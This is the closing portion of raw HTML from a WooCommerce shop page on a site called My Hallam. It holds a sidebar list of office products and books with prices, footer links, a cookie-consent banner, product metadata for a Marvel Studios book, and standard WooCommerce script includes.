		<img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/11/51wexfI0olL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/11/51wexfI0olL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/11/51wexfI0olL-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/51wexfI0olL-150x150.jpg 150w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">AmazonBasics Under Desk Foot Rest - Black</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>16.10</span>
	</li>
<li>
	
	<a href="https://myhallam.com/product/uni-ball-roller-pens-micro-point-0-5mm-black-12-count/">
		<img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/11/4109GERC00L-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/11/4109GERC00L-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/11/4109GERC00L-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/4109GERC00L-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/4109GERC00L.jpg 500w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">uni-ball Roller Pens, Micro Point (0.5mm), Black, 12 Count</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>8.97</span>
	</li>
<li>
	
	<a href="https://myhallam.com/product/essentials-chairmat-for-carpet-carpet-floor-protector-for-office-desk-chair-36-x-48-ess-8800c/">
		<img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/11/41mavBRFcsL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/11/41mavBRFcsL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/11/41mavBRFcsL-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/41mavBRFcsL-150x150.jpg 150w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">Essentials Chairmat for Carpet - Carpet Floor Protector for Office Desk Chair, 36 x 48 (ESS-8800C)</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>20.12</span>
	</li>
<li>
	
	<a href="https://myhallam.com/product/flash-furniture-high-back-black-mesh-executive-swivel-chair-with-chrome-plated-nylon-base-and-flip-up-arms/">
		<img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/11/41XGizkaDCL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/11/41XGizkaDCL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/11/41XGizkaDCL-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/41XGizkaDCL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/41XGizkaDCL.jpg 500w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">Flash Furniture High Back Black Mesh Executive Swivel Chair with Chrome Plated Nylon Base and Flip-Up Arms</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>117.59</span>
	</li>
<li>
	
	<a href="https://myhallam.com/product/small-acts-of-leadership-12-intentional-behaviors-that-lead-to-big-impact-hardcover/">
		<img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">Small Acts of Leadership: 12 Intentional Behaviors That Lead to Big Impact Hardcover</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>28.99</span>
	</li>
<li>
	
	<a href="https://myhallam.com/product/the-young-entrepreneurs-guide-to-starting-and-running-a-business-turn-your-ideas-into-money-paperback/">
		<img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">The Young Entrepreneur's Guide to Starting and Running a Business: Turn Your Ideas into Money! Paperback</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>17.70</span>
	</li>
</ul></aside><aside id="nav_menu-3" class="widget widget_nav_menu"><h3 class="widget-title">More Information</h3><div class="menu-legal-menu-container"><ul id="menu-legal-menu" class="menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"><a href="/terms-of-service">Terms of Service</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="/privacy-policy">Privacy Policy</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12"><a href="/dmca">DMCA</a></li>
<li id="menu-item-17" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17"><a href="/cookie-privacy-policy">Cookie Privacy Policy</a></li>
</ul></div></aside><aside id="categories-6" class="widget widget_categories"><h3 class="widget-title">Blog</h3>		<ul>
				<li class="cat-item cat-item-4"><a href="https://myhallam.com/category/internet/">Internet</a>
</li>
	<li class="cat-item cat-item-5"><a href="https://myhallam.com/category/laptops/">Laptops</a>
</li>
	<li class="cat-item cat-item-1"><a href="https://myhallam.com/category/uncategorized/">Uncategorized</a>
</li>
		</ul>
			</aside>	
</div>			</div>
		</div>
	</main>
</div>

<footer role="contentinfo">
    <div class="footer copyright-wrapper">
        <div class="container">
                        <div class="row">
                <div class="footer_hide col-xs-12 footer-block">
                                  </div>
                <div class="footer_hide col-xs-12 footer-block">
                                    </div>
                <div class="footer_hide col-xs-12 col-xs-12 footer-block">
                                    </div>
                 <div class="footer_hide col-xs-12 footer-block">
                                  </div>
            </div>
        </div>
    </div>

    <div class="footer-2 inner">
        <div class="container">
          	<div class="copyright text-center">
                <p>Copyright 2019 My Hallam | <a href=https://www.vwthemes.com/themes/free-construction-wordpress-theme/>Construction WordPress Theme</a></p>
                                                            <a href="#" class="scrollup"><i class="fas fa-long-arrow-alt-up"></i><span class="screen-reader-text">Scroll Up</span></a>
                                              	</div>
        </div>
      	<div class="clear"></div>
    </div>
</footer>
    <div id="cookie-law-info-bar"><span>This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. <a class="cli_settings_button"   style="margin:5px 20px 5px 20px;" >Cookie settings</a><a  data-cli_action="accept" id="cookie_action_close_header"  class="medium cli-plugin-button cli-plugin-main-button cookie_action_close_header cli_action_button" style="display:inline-block;  margin:5px; ">ACCEPT</a></span></div><div id="cookie-law-info-again" style="display:none;"><span id="cookie_hdr_showagain">Privacy & Cookies Policy</span></div><div class="cli-modal" id="cliSettingsPopup" tabindex="-1" role="dialog" aria-labelledby="cliSettingsPopup" aria-hidden="true">
  <div class="cli-modal-dialog" role="document">
    <div class="cli-modal-content cli-bar-popup">
      <button type="button" class="cli-modal-close" id="cliModalClose">
        <svg class="" viewBox="0 0 24 24"><path d="M19 6.41l-1.41-1.41-5.59 5.59-5.59-5.59-1.41 1.41 5.59 5.59-5.59 5.59 1.41 1.41 5.59-5.59 5.59 5.59 1.41-1.41-5.59-5.59z"></path><path d="M0 0h24v24h-24z" fill="none"></path></svg>
      </button>
      <div class="cli-modal-body">
        <div class="cli-container-fluid cli-tab-container">
    <div class="cli-row">
        <div class="cli-col-12 cli-align-items-stretch cli-px-0">
            <div class="cli-privacy-overview">
                <h4>Privacy Overview</h4>                                   
                <div class="cli-privacy-content">
                    <div class="cli-privacy-content-text">This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.</div>
                </div>
                <a class="cli-privacy-readmore" data-readmore-text="Show more" data-readless-text="Show less"></a>            </div>
        </div>  
        <div class="cli-col-12 cli-align-items-stretch cli-px-0 cli-tab-section-container">
            <div class="cli-tab-section cli-privacy-tab">
                <div class="cli-tab-header">
                    <a class="cli-nav-link cli-settings-mobile" >
                        Privacy Overview                    </a>
                </div>
                <div class="cli-tab-content">
                    <div class="cli-tab-pane cli-fade">
                        <p>This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.</p>
                    </div>
                </div>

            </div>
              
                            <div class="cli-tab-section">
                    <div class="cli-tab-header">
                        <a class="cli-nav-link cli-settings-mobile" data-target="necessary" data-toggle="cli-toggle-tab" >
                            Necessary 
                        </a>
                    
                    <span class="cli-necessary-caption">Always Enabled</span>                     </div>
                    <div class="cli-tab-content">
                        <div class="cli-tab-pane cli-fade" data-id="necessary">
                            <p>Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.</p>
                        </div>
                    </div>
                </div>
              
                            <div class="cli-tab-section">
                    <div class="cli-tab-header">
                        <a class="cli-nav-link cli-settings-mobile" data-target="non-necessary" data-toggle="cli-toggle-tab" >
                            Non-necessary 
                        </a>
                    <div class="cli-switch">
                        <input type="checkbox" id="checkbox-non-necessary" class="cli-user-preference-checkbox" data-id="checkbox-non-necessary" checked />
                        <label for="checkbox-non-necessary" class="cli-slider" data-cli-enable="Enabled" data-cli-disable="Disabled">Non-necessary</label>
                    </div>                    </div>
                    <div class="cli-tab-content">
                        <div class="cli-tab-pane cli-fade" data-id="non-necessary">
                            <p>Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.</p>
                        </div>
                    </div>
                </div>
                       
        </div>
    </div> 
</div> 
      </div>
    </div>
  </div>
</div>
<div class="cli-modal-backdrop cli-fade cli-settings-overlay"></div>
<div class="cli-modal-backdrop cli-fade cli-popupbar-overlay"></div>
<script type="text/javascript">
  /* <![CDATA[ */
  cli_cookiebar_settings='{"animate_speed_hide":"500","animate_speed_show":"500","background":"#FFF","border":"#b1a6a6c2","border_on":false,"button_1_button_colour":"#000","button_1_button_hover":"#000000","button_1_link_colour":"#fff","button_1_as_button":true,"button_1_new_win":false,"button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#444","button_2_as_button":false,"button_2_hidebar":false,"button_3_button_colour":"#000","button_3_button_hover":"#000000","button_3_link_colour":"#fff","button_3_as_button":true,"button_3_new_win":false,"button_4_button_colour":"#000","button_4_button_hover":"#000000","button_4_link_colour":"#62a329","button_4_as_button":false,"font_family":"inherit","header_fix":false,"notify_animate_hide":true,"notify_animate_show":false,"notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"bottom","scroll_close":false,"scroll_close_reload":false,"accept_close_reload":false,"reject_close_reload":false,"showagain_tab":true,"showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#000","show_once_yn":false,"show_once":"10000","logging_on":false,"as_popup":false,"popup_overlay":true,"bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"}';
  /* ]]> */
</script><script type="application/ld+json">{"@context":"https:\/\/schema.org\/","@graph":[{"@context":"https:\/\/schema.org\/","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"name":"Home","@id":"https:\/\/myhallam.com"}},{"@type":"ListItem","position":2,"item":{"name":"Books","@id":"https:\/\/myhallam.com\/product-category\/books\/"}},{"@type":"ListItem","position":3,"item":{"name":"Marvel Studios: The First Ten Years Hardcover","@id":"https:\/\/myhallam.com\/product\/marvel-studios-the-first-ten-years-hardcover\/"}}]},{"@context":"https:\/\/schema.org\/","@type":"Product","@id":"https:\/\/myhallam.com\/product\/marvel-studios-the-first-ten-years-hardcover\/#product","name":"Marvel Studios: The First Ten Years Hardcover","url":"https:\/\/myhallam.com\/product\/marvel-studios-the-first-ten-years-hardcover\/","description":"Celebrate the first 10 years of Marvel Studios movies in this collector's edition featuring all of the films from Iron Man to Captain Marvel!\r\n\r\n&amp;nbsp;\r\n\r\nIncludes interviews with Robert Downey Jr., Chris Evans, Scarlett Johansson, Chadwick Boseman, Chris Hemsworth, Chris Pratt and more, plus Marvel Studios President Kevin Feige and Co-President Louis D'Esposito.\r\n\r\n&amp;nbsp;\r\n\r\nFeatures stunning photography and in-depth sections on each film, including a guide to each movie's Easter Eggs and end-credits scenes.","image":"https:\/\/myhallam.com\/wp-content\/uploads\/2019\/12\/91vkys2daL.jpg","sku":306,"offers":[{"@type":"Offer","price":"20.39","priceValidUntil":"2020-12-31","priceSpecification":{"price":"20.39","priceCurrency":"USD","valueAddedTaxIncluded":"false"},"priceCurrency":"USD","availability":"http:\/\/schema.org\/InStock","url":"https:\/\/myhallam.com\/product\/marvel-studios-the-first-ten-years-hardcover\/","seller":{"@type":"Organization","name":"My Hallam","url":"https:\/\/myhallam.com"}}]}]}</script>	<script type="text/javascript">
		var c = document.body.className;
		c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
		document.body.className = c;
	</script>
	<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/myhallam.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.8.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_single_product_params = {"i18n_required_rating_text":"Please select a rating","review_rating_required":"yes","flexslider":{"rtl":false,"animation":"slide","smoothHeight":true,"directionNav":false,"controlNav":"thumbnails","slideshow":false,"animationSpeed":500,"animationLoop":false,"allowOneSlide":false},"zoom_enabled":"","zoom_options":[],"photoswipe_enabled":"","photoswipe_options":{"shareEl":false,"closeOnScroll":false,"history":false,"hideAnimationDuration":0,"showAnimationDuration":0},"flexslider_enabled":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/woocommerce/assets/js/frontend/single-product.min.js?ver=3.8.1'></script>
<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.8.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_16c3f07fc04e8f03ac9a17b58ea40fe3","fragment_name":"wc_fragments_16c3f07fc04e8f03ac9a17b58ea40fe3","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.8.1'></script>
<script type='text/javascript' src='https://myhallam.com/wp-content/themes/vw-construction-estate/js/bootstrap.js?ver=5.3.1'></script>
<script type='text/javascript' src='https://myhallam.com/wp-content/themes/vw-construction-estate/js/jquery.superfish.js?ver=5.3.1'></script>
<script type='text/javascript' src='https://myhallam.com/wp-includes/js/comment-reply.min.js?ver=5.3.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var newsletter = {"messages":{"email_error":"Email address is not correct","name_error":"Name is required","surname_error":"Last name is required","profile_error":"A mandatory field is not filled in","privacy_error":"You must accept the privacy policy"},"profile_max":"20"};
/* ]]> */
</script>
<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/newsletter/subscription/validate.js?ver=6.4.0'></script>
<script type='text/javascript' src='https://myhallam.com/wp-includes/js/wp-embed.min.js?ver=5.3.1'></script>
</body>
</html>
